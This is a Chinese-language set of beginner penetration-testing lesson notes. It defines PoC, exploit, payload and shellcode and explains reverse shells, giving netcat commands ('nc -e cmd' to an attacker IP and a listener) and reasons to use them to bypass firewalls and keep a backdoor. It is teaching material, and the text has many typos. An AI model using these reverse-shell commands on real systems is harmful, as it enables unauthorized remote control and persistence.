第一节:基础入门-操作系统&名词&文件下载&反弹 SHELL&防火墙绕过

基础入门-操作系统&名词&文件下载&反弹 SHELL&防火墙绕过

第一节:基础入门-操作系统&名词&文件下载&反弹 SHELL&防火墙绕过_第1张图片

1.POC、EXP、Payload与Shellcode

POC:全称Proofof Concept,中文”概念验证”,常指一段调洞证明的代码。EXP:全称Exploit”,中文”利用,指利用烈统漏洞进行攻击的动作Pavload: 中文有效就荷”,指成功exploit之后,真正在目标系统执行的代码或指令Shellcode: 简单翻译’shell代码”,是Payload的一种,由于其建立正向/反向shell而得名

1.2几点注意

POC是用来证明漏洞存在的,EXP是用来利用滑洞的,两者通常不是一类,或者说,PoC通常是无害的,Esp通常是有害的,有了POC,才有EXPPayload有很多种,它可以是Shellode,也可以直搜是一段系统命令,同一个Pad可以用于多个满洞,但每个温洞都有其自己的EXP,也就是说不存在通用的EXP.shellcode也有很多种,包括正向的,反向的,甚至meterpreter。

nc 被誉为网络安全界的瑞士军刀,一个简单而有用的工具,透过使用 TCP 或 UDP 协议的网络连接去读写数据。

本节课中使用nc命令完成了监听和反弹操作

首先使用服务器A(或主机)敲下以下命令 nc -e cmd ip地址 端口号 可以将cmd的权限移交给该ip地址的该端口号。

然后我们使用主机B敲下以下命令 nc - lvvp 端口号 命令进行监听该端口。当cmd权限移交完成,此时nc命令的监听功能便显现出来。

在主机B上敲下的cmd命令就相当控制服务器A敲下的cmd命令。这便是最典型的反弹操作。把服务器A的cmd权限反弹给主机B

但windows系统好像没有内置的nc(netcat),需要自行下载。

补充:

**正向shell:**控制端主动发起连接去连接被控制端

**反向shell:**被控制端主动连接控制端(也就是反弹shell)

那为什么需要用到反弹shell呢?

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?

有如下情况:

某客户机中了你的网马,但是它在局域网内,你直接连接不了。

目标机器的ip动态改变,你不能持续控制。

由于防火墙等限制,对方机器只能发送请求,不能接收请求。

对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,

webshell下执行命令不交互,为了方便提权或其它操作必须要反弹shell。

反弹shell相当于新增一个后门,当webshell被发现删除后权限不会丢失。

所以建立一个服务端让恶意程序主动连接,才是上策。

那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

反弹shell汇总,看我一篇就够了_lainwith的博客-CSDN博客_反弹shell这是链接,可以看一下。
https://blog.csdn.net/B_l_a_nk/article/details/129844602

你可能感兴趣的:(基础入门,网络安全)